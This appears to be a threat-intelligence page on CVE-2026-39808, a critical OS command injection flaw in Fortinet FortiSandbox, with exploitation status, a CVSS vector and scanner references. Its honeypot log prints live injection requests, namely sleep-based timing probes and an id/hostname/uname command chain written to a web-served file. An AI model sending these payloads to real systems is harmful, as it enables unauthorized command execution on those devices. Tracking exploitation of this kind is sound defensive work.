CVE-2026-39808

9.8

CVSS
Critical

PUBLISHED

A improper neutralization of special elements used in an os command ('os command injection') vulnerability in Fortinet FortiSandbox 4.4.0 through...

Not yet in CISA KEV

Exploited in the wild PoC available Remote Low complexity No user interaction

Vendor: Fortinet
Product: FortiSandbox, FortiSandbox PaaS
Published: Apr 14, 2026
EPSS: 16.7% · 95% pctl

Automate this intelligence with the Pro API

Everything on this page — CVSS, EPSS, exploit status, PoCs, scanner integrations, mentions, tags, and immediate honeypot data — is available programmatically for VM, SOC, and CTI workflows.

Learn about Pro

Description

A improper neutralization of special elements used in an os command ('os command injection') vulnerability in Fortinet FortiSandbox 4.4.0 through 4.4.8 may allow attacker to execute unauthorized code or commands via

edge

Weaknesses (CWE)

CWE-78

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

CVSS scores

CVSS v3.1 9.8 Critical

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Exploitation status

Exploited in the wild

Recorded 2026-06-12 13:59:12 UTC · KEVIntel

Proof of concept available

Recorded 2026-06-12 14:21:13 UTC · Nuclei Templates

Observed exploitation attempts

Exploitation attempts against this vulnerability observed first-hand by KEVIntel private honeypots over the last 30 days.

High confidence Active exploitation observed

Attempts observed: 4

Unique attacker IPs: 1

Attacker countries: 🇰🇷

Sensors observed: 1

Exploitation attempts over the last 30 days

Loading...

First observed 2026-06-12 13:59 UTC · Last observed 2026-06-12 14:05 UTC

Recent attempts

Showing observations from the last 30 days.

Attack Time	Attacker	Sensor	Request	Confidence	Raw Event
2026-06-12 14:05 UTC about 5 hours ago	🇰🇷 `3.37.30.177` Incheon, Incheon, South Korea Seen 4 times	🇪🇺 FortiSandbox	`GET /fortisandbox/job-detail/tracer-behavior?jid=%7C%28sleep+4%29%7C` python-requests/2.33.1	High	View Hide Attacker `3.37.30.177` 🇰🇷 Incheon, Incheon, South Korea Request `GET /fortisandbox/job-detail/tracer-behavior?jid=%7C%28sleep+4%29%7C` Query `jid=%7C%28sleep+4%29%7C` User-Agent `python-requests/2.33.1` Payload fingerprint `sha256:79ad94aa0dbf2a48416266c2fd3be196363977ad1d8731a6ebc1e2fd6f2fc5ad` Source KEVIntel Honeypot
2026-06-12 13:59 UTC about 5 hours ago	🇰🇷 `3.37.30.177` Incheon, Incheon, South Korea Seen 4 times	🇪🇺 FortiSandbox	`GET /fortisandbox/job-detail/tracer-behavior?jid=%7C%28sleep+3%29%7C` python-requests/2.33.1	High	View Hide Attacker `3.37.30.177` 🇰🇷 Incheon, Incheon, South Korea Request `GET /fortisandbox/job-detail/tracer-behavior?jid=%7C%28sleep+3%29%7C` Query `jid=%7C%28sleep+3%29%7C` User-Agent `python-requests/2.33.1` Payload fingerprint `sha256:c78dfa5dc916253039ff75683105ec5d68a79b0107f64138712e9a8f3e544323` Source KEVIntel Honeypot
2026-06-12 13:59 UTC about 5 hours ago	🇰🇷 `3.37.30.177` Incheon, Incheon, South Korea Seen 4 times	🇪🇺 FortiSandbox	`GET /fortisandbox/job-detail/tracer-behavior?jid=%7C%28echo+fdxmju_START+%26%26+id+%26%26+hostname+%26%26+uname+-a+%26%26+echo+fdxmju_END+%3E+%2Fweb%2Fng%2Fout.txt%29%7C` Mozilla/5.0	High	View Hide Attacker `3.37.30.177` 🇰🇷 Incheon, Incheon, South Korea Request `GET /fortisandbox/job-detail/tracer-behavior?jid=%7C%28echo+fdxmju_START+%26%26+id+%26%26+hostname+%26%26+uname+-a+%26%26+echo+fdxmju_END+%3E+%2Fweb%2Fng%2Fout.txt%29%7C` Query `jid=%7C%28echo+fdxmju_START+%26%26+id+%26%26+hostname+%26%26+uname+-a+%26%26+echo+fdxmju_END+%3E+%2Fweb%2Fng%2Fout.txt%29%7C` User-Agent `Mozilla/5.0` Payload fingerprint `sha256:722f5e689633a41fe62ad58f1c982cc4aaa6bb5dbf0ce123002395adc283e318` Source KEVIntel Honeypot
2026-06-12 13:59 UTC about 5 hours ago	🇰🇷 `3.37.30.177` Incheon, Incheon, South Korea Seen 4 times	🇪🇺 FortiSandbox	`GET /fortisandbox/job-detail/tracer-behavior?jid=%7C%28echo+gscwzb_START+%26%26+id+%26%26+hostname+%26%26+uname+-a+%26%26+echo+gscwzb_END+%3E+%2Fweb%2Fng%2Fout.txt%29%7C` Mozilla/5.0	High	View Hide Attacker `3.37.30.177` 🇰🇷 Incheon, Incheon, South Korea Request `GET /fortisandbox/job-detail/tracer-behavior?jid=%7C%28echo+gscwzb_START+%26%26+id+%26%26+hostname+%26%26+uname+-a+%26%26+echo+gscwzb_END+%3E+%2Fweb%2Fng%2Fout.txt%29%7C` Query `jid=%7C%28echo+gscwzb_START+%26%26+id+%26%26+hostname+%26%26+uname+-a+%26%26+echo+gscwzb_END+%3E+%2Fweb%2Fng%2Fout.txt%29%7C` User-Agent `Mozilla/5.0` Payload fingerprint `sha256:87503c24f2249c387fd6774ede84c31958df17c3c799829dcd1728111eb2bce3` Source KEVIntel Honeypot

References

https://fortiguard.fortinet.com/psirt/FG-IR-26-100

Known exploited vulnerability sources

Catalogues that list this CVE as a known exploited vulnerability.

Source	Added
KEVIntel First	2026-06-12 13:59 UTC

Scanner integrations

Scanner	Reference	Detected
Nuclei	https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2026/CVE-2026-39808.yaml	Jun 01, 2026

Potential proof of concepts

These PoCs are unverified and could contain malware. Use at your own risk.

CVE-2026-39808

nuclei · Created Unknown

Vulnerability detail

CVE-2026-39808

Automate this intelligence with the Pro API

Description

Weaknesses (CWE)

CVSS scores

Exploitation status

Observed exploitation attempts

Exploitation attempts over the last 30 days

Recent attempts

References

Known exploited vulnerability sources

Scanner integrations

Potential proof of concepts

Timeline